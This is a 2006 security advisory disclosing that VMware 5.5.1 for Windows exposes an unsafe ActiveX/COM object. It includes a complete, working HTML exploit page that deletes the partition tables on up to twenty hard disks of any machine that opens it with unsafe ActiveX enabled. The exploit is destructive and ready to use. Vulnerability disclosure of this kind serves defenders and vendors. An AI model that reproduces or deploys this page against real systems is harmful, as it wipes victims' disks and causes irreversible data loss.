Advisory ID:
XSec-06-05

Advisory Name:
VMware 5.5.1 for Windows arbitrary partition table delete issue.

Release Date:
08/16/2006

Tested on:
VMware 5.5.1 build-19175 on Windows Server 2000/2003

Affected version:
VMware 5.5.1

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
On running windows system, you can't delete, format and change system
dirver. \
VMware register a COM Object use for Virtual Disk, but it's very danger. \
I don't know how to name this issue. If you allow unsafe ActiveX and
jscript, \
and has VMware installed, the vmware.htm will delete all harddisk
partition \
table on the windows system. please backup your partition table first.

Exploit:

=============== vmware.htm start ================

<!--
// VMware 5.5.1 for Windows arbitrary partition table delete issue.
// Tested on Windows Server 2000/2003
//
// nop nop#xsec.org
// http://www.xsec.org
//

// CLSID: {0F748FDE-0597-443C-8596-71854C5EA20A}
// Info: Vie2Locator Class
// ProgID: VieLib2.Vie2Locator.1
// InprocServer32: C:\Program Files\Common Files\VMware\VMware Virtual
Image Editing\vielib.dll

--!>

<html><body>
<object classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}"
id="vmware"> </object>
<script>

var disk = 0; // HardDisk No

while (disk < 20)
{
var x = vmware.ConnectDisk(disk); // Connect to HardDisk
x.ResetLayout(); // Will clean all partition table on your Harddisk
disk += 1;
}
</script>
</body></html>

=============== vmware.htm end ==================

Link:
http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=13


About XSec:
We are redhat.